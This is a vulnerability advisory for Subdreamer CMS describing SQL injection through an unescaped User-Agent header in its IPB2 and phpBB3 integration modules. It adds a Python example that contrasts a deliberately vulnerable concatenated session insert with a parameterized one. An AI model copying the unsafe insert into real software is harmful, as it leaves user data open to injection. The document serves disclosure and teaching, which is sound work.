Background information:
This report applies to Subdreamer's newest stable release, 2.5.3.2 hotfix#5.
Subdreamer is a content management system written in PHP that uses
MySQL as its database backend. Subdreamer's home page is
http://www.subdreamer.com
Subdreamer can be integrated with different forum software, so that the
forum's login authentication and authorization information can also be
used in the CMS.
Vulnerability description:
Two of Subdreamer's integration modules are vulnerable: both the
Invision Power Board 2 and the phpBB3 integration modules share the
same flaw.
Both bulletin board systems store the browser's User-Agent string in the
sessions table used to track currently logged-in users. The User-Agent
string is taken as-is from the HTTP request headers and written into the
query without any validation or escaping, which opens the door to SQL
injection.
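To illustrate the class of flaw described above, the following is an added example, not Subdreamer's or either forum's code. It uses Python with an in-memory SQLite table as a stand-in for the MySQL sessions table, shows a session insert that concatenates the User-Agent header into the query beside the parameterized form, and adds a defence-in-depth header check; all table and column names are constructed.

```python
import sqlite3

# Constructed stand-in for a forum sessions table (SQLite here, MySQL in the real products).
SCHEMA = "CREATE TABLE sessions (id TEXT, member_id INTEGER, browser TEXT)"


def store_session_unsafe(conn, session_id, member_id, user_agent):
    """Mirrors the flaw: the header value is concatenated straight into the SQL text,
    so a single quote in User-Agent terminates the literal and alters the statement."""
    sql = (f"INSERT INTO sessions (id, member_id, browser) "
           f"VALUES ('{session_id}', {member_id}, '{user_agent}')")
    conn.execute(sql)


def store_session_safe(conn, session_id, member_id, user_agent):
    """Hardened form: bound parameters. The driver sends the value as data,
    so quotes inside it are stored verbatim and never parsed as SQL."""
    conn.execute(
        "INSERT INTO sessions (id, member_id, browser) VALUES (?, ?, ?)",
        (session_id, member_id, user_agent),
    )


def validate_user_agent(user_agent, max_len=255):
    """Defence in depth, not a substitute for parameter binding: reject control
    characters and over-long values before they reach the sessions table."""
    if len(user_agent) > max_len:
        return False
    return all(32 <= ord(c) < 127 for c in user_agent)


def demo(user_agent):
    """Run both inserts on a constructed User-Agent value.
    Returns (unsafe_insert_failed, value_stored_by_safe_insert)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    unsafe_failed = False
    try:
        store_session_unsafe(conn, "s1", 1, user_agent)
    except sqlite3.Error:
        # The concatenated statement no longer parses once the literal is broken.
        unsafe_failed = True
    store_session_safe(conn, "s2", 1, user_agent)
    row = conn.execute("SELECT browser FROM sessions WHERE id = 's2'").fetchone()
    return unsafe_failed, row[0]


if __name__ == "__main__":
    print(demo("Mozilla/5.0 (X11; Linux) O'Brien/1.0"))  # constructed header value
```

A plain header such as `Mozilla/5.0` succeeds on both paths; the value containing an apostrophe breaks only the concatenated query, while the bound insert stores it unchanged.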